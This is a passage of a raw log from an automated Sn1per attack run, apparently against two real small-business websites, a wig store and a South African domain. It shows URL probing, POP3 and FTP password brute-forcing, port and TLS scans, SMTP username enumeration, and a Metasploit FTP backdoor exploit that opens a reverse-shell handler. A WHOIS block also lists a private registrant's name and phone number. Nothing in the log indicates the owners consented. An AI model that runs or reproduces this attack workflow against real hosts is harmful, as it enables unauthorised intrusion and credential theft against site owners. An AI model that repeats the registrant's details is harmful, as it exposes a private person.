  628. _[ - ]::--------------------------------------------------------------------------------------------------------------
  629. |_[ + ] [ 2 / 19 ]-[21:26:05] [ - ]
  630. |_[ + ] Target:: [ http://www.hairwigstore.com/Store/Extensions ]
  631. |_[ + ] Exploit::
  632. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  633. |_[ + ] More details:: / - / , ISP:
  634. |_[ + ] Found:: UNIDENTIFIED
  635.  
  636. _[ - ]::--------------------------------------------------------------------------------------------------------------
  637. |_[ + ] [ 3 / 19 ]-[21:26:06] [ - ]
  638. |_[ + ] Target:: [ http://www.hairwigstore.com/Store/Toupees ]
  639. |_[ + ] Exploit::
  640. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  641. |_[ + ] More details:: / - / , ISP:
  642. |_[ + ] Found:: UNIDENTIFIED
  643.  
  644. _[ - ]::--------------------------------------------------------------------------------------------------------------
  645. |_[ + ] [ 4 / 19 ]-[21:26:07] [ - ]
  646. |_[ + ] Target:: [ http://www.hairwigstore.com/Sitemap ]
  647. |_[ + ] Exploit::
  648. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  649. |_[ + ] More details:: / - / , ISP:
  650. |_[ + ] Found:: UNIDENTIFIED
  651.  
  652. _[ - ]::--------------------------------------------------------------------------------------------------------------
  653. |_[ + ] [ 5 / 19 ]-[21:26:10] [ - ]
  654. |_[ + ] Target:: [ http://www.hairwigstore.com/Store/Costume-Wigs ]
  655. |_[ + ] Exploit::
  656. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  657. |_[ + ] More details:: / - / , ISP:
  658. |_[ + ] Found:: UNIDENTIFIED
  659.  
  660. _[ - ]::--------------------------------------------------------------------------------------------------------------
  661. |_[ + ] [ 6 / 19 ]-[21:26:12] [ - ]
  662. |_[ + ] Target:: [ http://www.hairwigstore.com/Wigs/Human-Hair-Wigs ]
  663. |_[ + ] Exploit::
  664. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  665. |_[ + ] More details:: / - / , ISP:
  666. |_[ + ] Found:: UNIDENTIFIED
  667.  
  668. _[ - ]::--------------------------------------------------------------------------------------------------------------
  669. |_[ + ] [ 7 / 19 ]-[21:26:14] [ - ]
  670. |_[ + ] Target:: [ http://www.hairwigstore.com/Wigs/African-American-Wigs ]
  671. |_[ + ] Exploit::
  672. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  673. |_[ + ] More details:: / - / , ISP:
  674. |_[ + ] Found:: UNIDENTIFIED
  675.  
  676. _[ - ]::--------------------------------------------------------------------------------------------------------------
  677. |_[ + ] [ 8 / 19 ]-[21:26:15] [ - ]
  678. |_[ + ] Target:: [ http://www.hairwigstore.com/Store/Wig-Care-and-Tools ]
  679. |_[ + ] Exploit::
  680. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  681. |_[ + ] More details:: / - / , ISP:
  682. |_[ + ] Found:: UNIDENTIFIED
  683.  
  684. _[ - ]::--------------------------------------------------------------------------------------------------------------
  685. |_[ + ] [ 9 / 19 ]-[21:26:17] [ - ]
  686. |_[ + ] Target:: [ http://www.hairwigstore.com/Wig-Care-and-Tools/Other ]
  687. |_[ + ] Exploit::
  688. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  689. |_[ + ] More details:: / - / , ISP:
  690. |_[ + ] Found:: UNIDENTIFIED
  691.  
  692. _[ - ]::--------------------------------------------------------------------------------------------------------------
  693. |_[ + ] [ 10 / 19 ]-[21:26:19] [ - ]
  694. |_[ + ] Target:: [ http://www.hairwigstore.com/Wig-Care-and-Tools/Adhesives ]
  695. |_[ + ] Exploit::
  696. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  697. |_[ + ] More details:: / - / , ISP:
  698. |_[ + ] Found:: UNIDENTIFIED
  699.  
  700. _[ - ]::--------------------------------------------------------------------------------------------------------------
  701. |_[ + ] [ 11 / 19 ]-[21:26:20] [ - ]
  702. |_[ + ] Target:: [ http://www.hairwigstore.com/Wig-Care-and-Tools/Caps ]
  703. |_[ + ] Exploit::
  704. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  705. |_[ + ] More details:: / - / , ISP:
  706. |_[ + ] Found:: UNIDENTIFIED
  707.  
  708. _[ - ]::--------------------------------------------------------------------------------------------------------------
  709. |_[ + ] [ 12 / 19 ]-[21:26:22] [ - ]
  710. |_[ + ] Target:: [ http://www.hairwigstore.com/Wig-Care-and-Tools/Wig-Stands ]
  711. |_[ + ] Exploit::
  712. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  713. |_[ + ] More details:: / - / , ISP:
  714. |_[ + ] Found:: UNIDENTIFIED
  715.  
  716. _[ - ]::--------------------------------------------------------------------------------------------------------------
  717. |_[ + ] [ 13 / 19 ]-[21:26:23] [ - ]
  718. |_[ + ] Target:: [ http://www.hairwigstore.com/how-to-put-on-a-wig ]
  719. |_[ + ] Exploit::
  720. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  721. |_[ + ] More details:: / - / , ISP:
  722. |_[ + ] Found:: UNIDENTIFIED
  723.  
  724. _[ - ]::--------------------------------------------------------------------------------------------------------------
  725. |_[ + ] [ 14 / 19 ]-[21:26:24] [ - ]
  726. |_[ + ] Target:: [ http://www.hairwigstore.com/how-to-apply-lace-front-wigs ]
  727. |_[ + ] Exploit::
  728. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  729. |_[ + ] More details:: / - / , ISP:
  730. |_[ + ] Found:: UNIDENTIFIED
  731.  
  732. _[ - ]::--------------------------------------------------------------------------------------------------------------
  733. |_[ + ] [ 15 / 19 ]-[21:26:25] [ - ]
  734. |_[ + ] Target:: [ http://www.hairwigstore.com/how-to-make-clip-in-hair-extension ]
  735. |_[ + ] Exploit::
  736. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  737. |_[ + ] More details:: / - / , ISP:
  738. |_[ + ] Found:: UNIDENTIFIED
  739.  
  740. _[ - ]::--------------------------------------------------------------------------------------------------------------
  741. |_[ + ] [ 16 / 19 ]-[21:26:26] [ - ]
  742. |_[ + ] Target:: [ http://www.hairwigstore.com/Wig-Care-and-Tools/function.file-get-contents ]
  743. |_[ + ] Exploit::
  744. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  745. |_[ + ] More details:: / - / , ISP:
  746. |_[ + ] Found:: UNIDENTIFIED
  747.  
  748. _[ - ]::--------------------------------------------------------------------------------------------------------------
  749. |_[ + ] [ 17 / 19 ]-[21:26:27] [ - ]
  750. |_[ + ] Target:: [ http://www.hairwigstore.com/how-do-i-create-a-hairline-in-a-wig ]
  751. |_[ + ] Exploit::
  752. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  753. |_[ + ] More details:: / - / , ISP:
  754. |_[ + ] Found:: UNIDENTIFIED
  755.  
  756. _[ - ]::--------------------------------------------------------------------------------------------------------------
  757. |_[ + ] [ 18 / 19 ]-[21:26:28] [ - ]
  758. |_[ + ] Target:: [ http://www.hairwigstore.com/determining-the-type-of-wig-you-need ]
  759. |_[ + ] Exploit::
  760. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  761. |_[ + ] More details:: / - / , ISP:
  762. |_[ + ] Found:: UNIDENTIFIED
  763.  
  764. [ INFO ] [ Shutting down ]
  765. [ INFO ] [ End of process INURLBR at [07-07-2016 21:26:28]
  766. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  767. [ INFO ] [ OUTPUT FILE ]:: [ /root/Sn1per/output/loot/inurlbr-hairwigstore.com.txt ]
  768. |_________________________________________________________________________________________
  769.  
  770. \_________________________________________________________________________________________/
  771.  
  772. + -- --=[Port 110 opened... running tests...
  773.  
  774. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-07 21:26 EEST
  775. Nmap scan report for hairwigstore.com (192.254.237.91)
  776. Host is up (0.23s latency).
  777. PORT STATE SERVICE VERSION
  778. 110/tcp open pop3 Dovecot pop3d
  779. | pop3-brute:
  780. | Accounts: No valid accounts found
  781. |_ Statistics: Performed 120 guesses in 183 seconds, average tps: 0
  782. |_pop3-capabilities: PIPELINING AUTH-RESP-CODE USER RESP-CODES STLS UIDL CAPA TOP SASL(PLAIN LOGIN)
  783.  
  784. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  785. Nmap done: 1 IP address (1 host up) scanned in 185.38 seconds
  786. + -- --=[Port 111 closed... skipping.
  787. + -- --=[Port 135 closed... skipping.
  788. + -- --=[Port 139 closed... skipping.
  789. + -- --=[Port 162 closed... skipping.
  790. + -- --=[Port 389 closed... skipping.
  791. + -- --=[Port 443 opened... running tests...
  792. ################################### Checking for WAF ##############################
  793.  
  794. ^ ^
  795. _ __ _ ____ _ __ _ _ ____
  796. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  797. | V V // o // _/ | V V // 0 // 0 // _/
  798. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  799. <
  800. ...'
  801.  
  802. WAFW00F - Web Application Firewall Detection Tool
  803.  
  804. By Sandro Gauci && Wendel G. Henrique
  805.  
  806. Checking https://hairwigstore.com
  807. The site https://hairwigstore.com is behind a ModSecurity (OWASP CRS)
  808. Number of requests: 11
  809.  
  810. ################################### Gathering HTTP Info ###########################
  811. ./whatweb: /usr/lib/ruby/vendor_ruby/rchardet/universaldetector.rb:39: invalid multibyte escape: /[\x80-\xFF]/ (SyntaxError)
  812.  
  813. ################################### Gathering SSL/TLS Info ########################
  814. Version: 1.11.7-static
  815. OpenSSL 1.0.2i-dev xx XXX xxxx
  816.  
  817. Testing SSL server hairwigstore.com on port 443
  818.  
  819. TLS Fallback SCSV:
  820. Server supports TLS Fallback SCSV
  821.  
  822. TLS renegotiation:
  823. Secure session renegotiation supported
  824.  
  825. TLS Compression:
  826. Compression disabled
  827.  
  828. Heartbleed:
  829. TLS 1.2 not vulnerable to heartbleed
  830. TLS 1.1 not vulnerable to heartbleed
  831. TLS 1.0 not vulnerable to heartbleed
  832.  
  833. Supported Server Cipher(s):
  834. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  835. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  836. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  837. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  838. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
  839. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
  840. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
  841. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
  842. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  843. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  844. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  845. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  846. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  847. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  848. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  849. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  850. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  851. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  852. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  853. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  854.  
  855. SSL Certificate:
  856. Signature Algorithm: sha256WithRSAEncryption
  857. RSA Key Strength: 2048
  858.  
  859. Subject: *.hostgator.com
  860. Altnames: DNS:*.hostgator.com, DNS:hostgator.com
  861. Issuer: COMODO RSA Domain Validation Secure Server CA
  862.  
  863. Not valid before: Oct 16 00:00:00 2015 GMT
  864. Not valid after: Oct 15 23:59:59 2018 GMT
  865.  
  866.  
  867.  
  868. AVAILABLE PLUGINS
  869. -----------------
  870.  
  871. PluginCertInfo
  872. PluginOpenSSLCipherSuites
  873. PluginChromeSha1Deprecation
  874. PluginHSTS
  875. PluginSessionResumption
  876. PluginHeartbleed
  877. PluginSessionRenegotiation
  878. PluginCompression
  879.  
  880.  
  881.  
  882. CHECKING HOST(S) AVAILABILITY
  883. -----------------------------
  884.  
  885. hairwigstore.com:443 => 192.254.237.91:443
  886.  
  887.  
  888.  
  889. SCAN RESULTS FOR HAIRWIGSTORE.COM:443 - 192.254.237.91:443
  890. ----------------------------------------------------------
  891.  
  892. * Deflate Compression:
  893. OK - Compression disabled
  894.  
  895. * Session Renegotiation:
  896. Client-initiated Renegotiations: OK - Rejected
  897. Secure Renegotiation: OK - Supported
  898.  
  899. * Certificate - Content:
  900. SHA1 Fingerprint: 9141b50cee603888dc45f4f285c1c8844fe12221
  901. Common Name: *.hostgator.com
  902. Issuer: COMODO RSA Domain Validation Secure Server CA
  903. Serial Number: 19607DA086E8A7FE72900982CFED93BF
  904. Not Before: Oct 16 00:00:00 2015 GMT
  905. Not After: Oct 15 23:59:59 2018 GMT
  906. Signature Algorithm: sha256WithRSAEncryption
  907. Public Key Algorithm: rsaEncryption
  908. Key Size: 2048 bit
  909. Exponent: 65537 (0x10001)
  910. X509v3 Subject Alternative Name: {'DNS': ['*.hostgator.com', 'hostgator.com']}
  911.  
  912. * Certificate - Trust:
  913. Hostname Validation: FAILED - Certificate does NOT match hairwigstore.com
  914. Google CA Store (09/2015): OK - Certificate is trusted
  915. Java 6 CA Store (Update 65): OK - Certificate is trusted
  916. Microsoft CA Store (09/2015): OK - Certificate is trusted
  917. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  918. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  919. Certificate Chain Received: ['*.hostgator.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
  920.  
  921. * Certificate - OCSP Stapling:
  922. NOT SUPPORTED - Server did not send back an OCSP response.
  923.  
  924. * Session Resumption:
  925. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  926. With TLS Session Tickets: OK - Supported
  927.  
  928. * SSLV2 Cipher Suites:
  929. Server rejected all cipher suites.
  930.  
  931. * SSLV3 Cipher Suites:
  932. Undefined - An unexpected error happened:
  933. PSK-3DES-EDE-CBC-SHA error - [Errno 111] Connection refused
  934. NULL-SHA256 error - [Errno 111] Connection refused
  935. NULL-SHA error - [Errno 111] Connection refused
  936. NULL-MD5 error - [Errno 111] Connection refused
  937. EXP-RC4-MD5 error - [Errno 111] Connection refused
  938. EXP-RC2-CBC-MD5 error - [Errno 111] Connection refused
  939. EXP-EDH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
  940. EXP-EDH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
  941. EXP-DES-CBC-SHA error - [Errno 111] Connection refused
  942. EXP-ADH-RC4-MD5 error - [Errno 111] Connection refused
  943. EXP-ADH-DES-CBC-SHA error - [Errno 111] Connection refused
  944. EDH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
  945. EDH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
  946. ECDHE-RSA-NULL-SHA error - [Errno 111] Connection refused
  947. ECDHE-ECDSA-NULL-SHA error - [Errno 111] Connection refused
  948. ECDH-RSA-NULL-SHA error - [Errno 111] Connection refused
  949. ECDH-RSA-DES-CBC3-SHA error - [Errno 111] Connection refused
  950. ECDH-ECDSA-NULL-SHA error - [Errno 111] Connection refused
  951. ECDH-ECDSA-DES-CBC3-SHA error - [Errno 111] Connection refused
  952. DH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
  953. DH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
  954. DES-CBC3-SHA error - [Errno 111] Connection refused
  955. DES-CBC-SHA error - [Errno 111] Connection refused
  956. AECDH-NULL-SHA error - [Errno 111] Connection refused
  957. ADH-DES-CBC3-SHA error - [Errno 111] Connection refused
  958. ADH-DES-CBC-SHA error - [Errno 111] Connection refused
  959.  
  960.  
  961.  
  962. SCAN COMPLETED IN 18.61 S
  963. -------------------------
  964.  
  965. **TARGET: YOUSTAY.CO.ZA **
  966. ____
  967. _________ / _/___ ___ _____
  968. / ___/ __ \ / // __ \/ _ \/ ___/
  969. (__ ) / / // // /_/ / __/ /
  970. /____/_/ /_/___/ .___/\___/_/
  971. /_/
  972.  
  973. + -- --=[http://crowdshield.com
  974. + -- --=[sn1per v1.7 by 1N3
  975.  
  976. ################################### Running recon #################################
  977. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
  978. Server: 8.8.8.8
  979. Address: 8.8.8.8#53
  980.  
  981. Non-authoritative answer:
  982. Name: youstay.co.za
  983. Address: 50.87.144.166
  984.  
  985. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
  986. youstay.co.za has address 50.87.144.166
  987.  
  988. Xprobe2 v.0.3 Copyright (c) 2002-2005 [email protected], [email protected], [email protected]
  989.  
  990. [+] Target is youstay.co.za
  991. [+] Loading modules.
  992. [+] Following modules are loaded:
  993. [x] [1] ping:icmp_ping - ICMP echo discovery module
  994. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  995. [x] [3] ping:udp_ping - UDP-based ping discovery module
  996. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  997. [x] [5] infogather:portscan - TCP and UDP PortScanner
  998. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  999. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  1000. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  1001. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  1002. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  1003. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  1004. [x] [12] fingerprint:smb - SMB fingerprinting module
  1005. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  1006. [+] 13 modules registered
  1007. [+] Initializing scan engine
  1008. [+] Running scan engine
  1009. [-] ping:tcp_ping module: no closed/open TCP ports known on 50.87.144.166. Module test failed
  1010. [-] ping:udp_ping module: no closed/open UDP ports known on 50.87.144.166. Module test failed
  1011. [-] No distance calculation. 50.87.144.166 appears to be dead or no ports known
  1012. [+] Host: 50.87.144.166 is up (Guess probability: 50%)
  1013. [+] Target: 50.87.144.166 is alive. Round-Trip Time: 0.22283 sec
  1014. [+] Selected safe Round-Trip Time value is: 0.44567 sec
  1015. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  1016. [-] fingerprint:smb need either TCP port 139 or 445 to run
  1017. [-] fingerprint:snmp: need UDP port 161 open
  1018. [+] Primary guess:
  1019. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
  1020. [+] Other guesses:
  1021. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
  1022. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
  1023. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
  1024. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
  1025. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
  1026. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
  1027. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
  1028. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
  1029. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
  1030. [+] Cleaning up scan engine
  1031. [+] Modules deinitialized
  1032. [+] Execution completed.
  1033. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
  1034.  
  1035. ; <<>> DiG 9.10.3-P4-Debian <<>> -x youstay.co.za
  1036. ;; global options: +cmd
  1037. ;; Got answer:
  1038. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 28326
  1039. ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  1040.  
  1041. ;; OPT PSEUDOSECTION:
  1042. ; EDNS: version: 0, flags:; udp: 4096
  1043. ;; QUESTION SECTION:
  1044. ;za.co.youstay.in-addr.arpa. IN PTR
  1045.  
  1046. ;; AUTHORITY SECTION:
  1047. in-addr.arpa. 3505 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2015073986 1800 900 604800 3600
  1048.  
  1049. ;; Query time: 159 msec
  1050. ;; SERVER: 8.8.8.8#53(8.8.8.8)
  1051. ;; WHEN: Mon Jul 11 00:47:57 EEST 2016
  1052. ;; MSG SIZE rcvd: 123
  1053.  
  1054. Domain Name:
  1055. youstay.co.za
  1056.  
  1057. Registrant:
  1058. Joel Giddey
  1059.  
  1060. Tel: +27.218533256
  1061. Fax:
  1062.  
  1063. Registrant's Address:
  1064. Strand
  1065.  
  1066. Registrar:
  1067. ZACR
  1068.  
  1069. Relevant Dates:
  1070. Registration Date: 2008-10-07
  1071. Renewal Date: 2016-10-07
  1072.  
  1073. Domain Status:
  1074. Registered until renewal date
  1075.  
  1076. Pending Timer Events:
  1077. None
  1078.  
  1079. Name Servers:
  1080. ns1103.hostgator.com
  1081. ns1104.hostgator.com
  1082.  
  1083. WHOIS lookup made at 2016-07-10 21:47 UTC
  1084.  
  1085. --
  1086. The use of this Whois facility is subject to the following terms and
  1087. conditions. https://registry.net.za/whois_terms
  1088. Copyright (c) ZACR 1995-2016
  1089. Smartmatch is experimental at ./dnsenum.pl line 698.
  1090. Smartmatch is experimental at ./dnsenum.pl line 698.
  1091. dnsenum.pl VERSION:1.2.4
  1092.  
  1093. ----- youstay.co.za -----
  1094.  
  1095.  
  1096. Host's addresses:
  1097. __________________
  1098.  
  1099. youstay.co.za. 3594 IN A 50.87.144.166
  1100.  
  1101.  
  1102. Wildcard detection using: mzlsmbdjzsqd
  1103. _______________________________________
  1104.  
  1105. mzlsmbdjzsqd.youstay.co.za. 3600 IN A 50.87.144.166
  1106.  
  1107.  
  1108. !!!!!!!!!!!!!!!!!!!!!!!!!!!!
  1109.  
  1110. Wildcards detected, all subdomains will point to the same IP address
  1111. Omitting results containing 50.87.144.166.
  1112. Maybe you are using OpenDNS servers.
  1113.  
  1114. !!!!!!!!!!!!!!!!!!!!!!!!!!!!
  1115.  
  1116.  
  1117. Name Servers:
  1118. ______________
  1119.  
  1120. youstay.co.za NS record query failed: NOERROR
  1121.  
  1122. ____ _ _ _ _ _____
  1123. / ___| _ _| |__ | (_)___| |_|___ / _ __
  1124. \___ \| | | | '_ \| | / __| __| |_ \| '__|
  1125. ___) | |_| | |_) | | \__ \ |_ ___) | |
  1126. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  1127.  
  1128. # Fast Subdomains Enumeration tool using Search Engines and BruteForce
  1129. # Coded By Ahmed Aboul-Ela - @aboul3la
  1130. # Special Thanks to Ibrahim Mosaad - @ibrahim_mosaad for his contributions
  1131.  
  1132. [-] Enumerating subdomains now for youstay.co.za
  1133. [-] verbosity is enabled, will show the subdomains results in realtime
  1134. [-] Searching now in Baidu..
  1135. [-] Searching now in Yahoo..
  1136. [-] Searching now in Google..
  1137. [-] Searching now in Bing..
  1138. [-] Searching now in Ask..
  1139. [-] Searching now in Netcraft..
  1140. [-] Searching now in DNSdumpster..
  1141.  
  1142. ################################### Pinging host ###################################
  1143. PING youstay.co.za (50.87.144.166) 56(84) bytes of data.
  1144. 64 bytes from gator3130.hostgator.com (50.87.144.166): icmp_seq=1 ttl=51 time=220 ms
  1145.  
  1146. --- youstay.co.za ping statistics ---
  1147. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  1148. rtt min/avg/max/mdev = 220.910/220.910/220.910/0.000 ms
  1149.  
  1150. ################################### Running TCP port scan ##########################
  1151.  
  1152. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 00:48 EEST
  1153. Nmap scan report for youstay.co.za (50.87.144.166)
  1154. Host is up (0.23s latency).
  1155. rDNS record for 50.87.144.166: gator3130.hostgator.com
  1156. Not shown: 23 closed ports, 6 filtered ports
  1157. PORT STATE SERVICE
  1158. 21/tcp open ftp
  1159. 25/tcp open smtp
  1160. 80/tcp open http
  1161. 110/tcp open pop3
  1162. 443/tcp open https
  1163. 3306/tcp open mysql
  1164. 8080/tcp open http-proxy
  1165. 8443/tcp open https-alt
  1166.  
  1167. Nmap done: 1 IP address (1 host up) scanned in 2.33 seconds
  1168. ################################### Running UDP port scan ##########################
  1169.  
  1170. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 00:48 EEST
  1171. WARNING: a TCP scan type was requested, but no tcp ports were specified. Skipping this scan type.
  1172. Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds
  1173.  
  1174. ################################### Running Intrusive Scans ########################
  1175. + -- --=[Port 21 opened... running tests...
  1176.  
  1177. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 00:48 EEST
  1178. Nmap scan report for youstay.co.za (50.87.144.166)
  1179. Host is up (0.23s latency).
  1180. rDNS record for 50.87.144.166: gator3130.hostgator.com
  1181. PORT STATE SERVICE VERSION
  1182. 21/tcp open ftp Pure-FTPd
  1183. | ftp-brute:
  1184. | Accounts: No valid accounts found
  1185. | Statistics: Performed 17 guesses in 66 seconds, average tps: 0
  1186. |_ ERROR: Too many retries, aborted ...
  1187.  
  1188. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1189. Nmap done: 1 IP address (1 host up) scanned in 67.50 seconds
  1190.  
  1191. IIIIII dTb.dTb _.---._
  1192. II 4' v 'B .'"".'/|\`.""'.
  1193. II 6. .P : .' / | \ `. :
  1194. II 'T;. .;P' '.' / | \ `.'
  1195. II 'T; ;P' `. / | \ .'
  1196. IIIIII 'YvP' `-.__|__.-'
  1197.  
  1198. I love shells --egypt
  1199.  
  1200.  
  1201. Easy phishing: Set up email templates, landing pages and listeners
  1202. in Metasploit Pro -- learn more on http://rapid7.com/metasploit
  1203.  
  1204. =[ metasploit v4.12.7-dev ]
  1205. + -- --=[ 1551 exploits - 898 auxiliary - 267 post ]
  1206. + -- --=[ 438 payloads - 38 encoders - 8 nops ]
  1207. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  1208.  
  1209. RHOST => youstay.co.za
  1210. RHOSTS => youstay.co.za
  1211. [*] youstay.co.za:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  1212. 220-You are user number 5 of 150 allowed.
  1213. 220-Local time is now 16:49. Server port: 21.
  1214. 220-IPv6 connections are also welcome on this server.
  1215. 220 You will be disconnected after 15 minutes of inactivity.
  1216. [*] youstay.co.za:21 - USER: 331 User 5:) OK. Password required
  1217. [*] Exploit completed, but no session was created.
  1218. [*] Started reverse TCP double handler on 10.42.0.14:4444
  1219. [*] youstay.co.za:21 - Sending Backdoor Command
  1220. [*] Exploit completed, but no session was created.
  1221. + -- --=[Port 22 closed... skipping.
  1222. + -- --=[Port 23 closed... skipping.
  1223. + -- --=[Port 25 opened... running tests...
  1224.  
  1225. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 00:49 EEST
  1226. Nmap scan report for youstay.co.za (50.87.144.166)
  1227. Host is up (0.22s latency).
  1228. rDNS record for 50.87.144.166: gator3130.hostgator.com
  1229. PORT STATE SERVICE VERSION
  1230. 25/tcp open smtp Exim smtpd 4.86_1
  1231. |_smtp-commands: Couldn't establish connection on port 25
  1232. | smtp-enum-users:
  1233. |_ Couldn't establish connection on port 25
  1234. |_smtp-open-relay: SMTP RSET: failed to receive data: connection closed
  1235. | smtp-vuln-cve2010-4344:
  1236. |_ The SMTP server is not Exim: NOT VULNERABLE
  1237.  
  1238. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1239. Nmap done: 1 IP address (1 host up) scanned in 32.88 seconds
  1240. Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
  1241.  
  1242. ----------------------------------------------------------
  1243. | Scan Information |
  1244. ----------------------------------------------------------
  1245.  
  1246. Mode ..................... VRFY
  1247. Worker Processes ......... 5
  1248. Usernames file ........... BruteX/wordlists/simple-users.txt
  1249. Target count ............. 1
  1250. Username count ........... 34
  1251. Target TCP port .......... 25
  1252. Query timeout ............ 5 secs
  1253. Target domain ............
  1254.  
  1255. ######## Scan started at Mon Jul 11 00:50:24 2016 #########
  1256. ######## Scan completed at Mon Jul 11 00:50:34 2016 #########
